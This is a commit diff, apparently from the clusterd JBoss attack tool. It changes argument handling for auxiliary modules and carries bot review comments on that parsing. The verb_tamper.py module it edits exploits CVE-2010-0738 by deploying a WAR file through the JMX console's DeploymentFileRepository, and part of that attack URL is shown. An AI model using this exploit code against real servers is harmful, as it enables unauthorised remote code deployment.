

Modifications from #33
* src/core/auxengine.py
  -- Auxiliary modules can now enable parameter passing via the
  enable_args flag.  Flag arguments will then be passed into
  the module via the fingerengine.options argument.
* src/platform/jboss/auxiliary/verb_tamper.py
  -- Few more fixes to this and an enabling of enable_args so
  that we don't confuse the deployer.  Not sure why this was
  so broken...
hatRiot committed Jan 25, 2015
1 parent d9d956a commit cac3b14
Showing 2 changed files with 16 additions and 7 deletions.
17 changes: 13 additions & 4 deletions src/core/auxengine.py
@@ -1,6 +1,7 @@
from os.path import abspath
from argparse import SUPPRESS
from log import LOG
from re import sub
import deployer
import undeployer
import pkgutil
Expand Down Expand Up @@ -40,7 +41,12 @@ def auxengine(fingerengine):
if mod.name not in found and mod.check(fingerprint):
if fingerengine.options.fp:
utility.Msg(" %s (--%s)" % (mod.name, mod.flag), LOG.UPDATE)
elif vars(fingerengine.options)[mod.flag]:

# work around argparse internally converting - to _ for var names
elif (mod.flag in vars(fingerengine.options) and \
vars(fingerengine.options)[mod.flag]) or \
(sub('-','_',mod.flag) in vars(fingerengine.options) and\
vars(fingerengine.options)[sub('-','_',mod.flag)]):
try:
mod.run(fingerengine, fingerprint)
except Exception, e:
Expand All @@ -65,7 +71,7 @@ def execMod(fingerengine):
def build_platform_flags(platform, egroup):
""" This builds the auxiliary argument group
"""

fpath = [abspath("./src/platform/%s/auxiliary" % platform)]
modules = list(pkgutil.iter_modules(fpath))

Expand All @@ -82,7 +88,10 @@ def build_platform_flags(platform, egroup):
if not 'flag' in dir(mod):
continue

egroup.add_argument("--%s" % mod.flag, action='store_true', dest=mod.flag,
help=SUPPRESS)
if 'enable_args' in dir(mod):
egroup.add_argument("--%s" % mod.flag, action='store', help=SUPPRESS)
else:
egroup.add_argument("--%s" % mod.flag, action='store_true', dest=mod.flag,
help=SUPPRESS)

return egroup
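Review bot: The two `add_argument` branches in build_platform_flags now store their values under differently named attributes: the `store_true` branch passes `dest=mod.flag` and keeps the dash, while the new `action='store'` branch omits `dest`, so argparse derives the name with underscores, which is what forces the four-way `vars()` lookup added in auxengine. Passing `dest=mod.flag.replace('-', '_')` in both branches would let that condition shrink to `elif getattr(fingerengine.options, mod.flag.replace('-', '_'), None):` and make the `re.sub` import unnecessary, though any other reader of these options outside this page would need checking first. Separately, `'enable_args' in dir(mod)` tests only that the attribute exists, so a module that sets `enable_args = False` would still get a value-taking flag; `if getattr(mod, 'enable_args', False):` reads the value instead. Both function bodies extend beyond the lines shown here.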
6 changes: 3 additions & 3 deletions src/platform/jboss/auxiliary/verb_tamper.py
Expand Up @@ -13,6 +13,7 @@ def __init__(self):
self.name = 'JBoss Verb Tampering (CVE-2010-0738)'
self.versions = ["4.0"]
self.flag = 'verb-tamper'
self.enable_args = True

def check(self, fingerprint):
"""
Expand All @@ -32,14 +33,13 @@ def run(self, fingerengine, fingerprint):
utility.Msg("Checking %s for verb tampering" % fingerengine.options.ip,
LOG.DEBUG)

url = "http://{0}:{1}/jmx-console/HtmlAdaptor".format(fingerengine.options.ip,
fingerprint.port)
url = "http://{0}:{1}".format(fingerengine.options.ip, fingerprint.port)

response = utility.requests_head(url)
if response.status_code == 200:
utility.Msg("Vulnerable to verb tampering, attempting to deploy...", LOG.SUCCESS)

war_file = abspath(fingerengine.options.deploy)
war_file = abspath(fingerengine.options.verb_tamper)
war_name = parse_war_path(war_file)
tamper = "/jmx-console/HtmlAdaptor?action=invokeOp"\
"&name=jboss.admin:service=DeploymentFileRepository&methodIndex=5"\
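Review bot: `war_file = abspath(fingerengine.options.verb_tamper)` in run() takes the flag's value as a filesystem path without checking that it names an existing file, and because the argument is registered with `help=SUPPRESS` nothing tells the operator that `--verb-tamper` now expects a WAR path instead of acting as a switch. A comment beside the new attribute would record the contract, e.g. `self.enable_args = True  # --verb-tamper takes the path of the WAR to deploy; read in run() as options.verb_tamper`. run() could also return with a message, before any request is sent, when the path is not a regular file. The body of run() continues past the last line shown.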
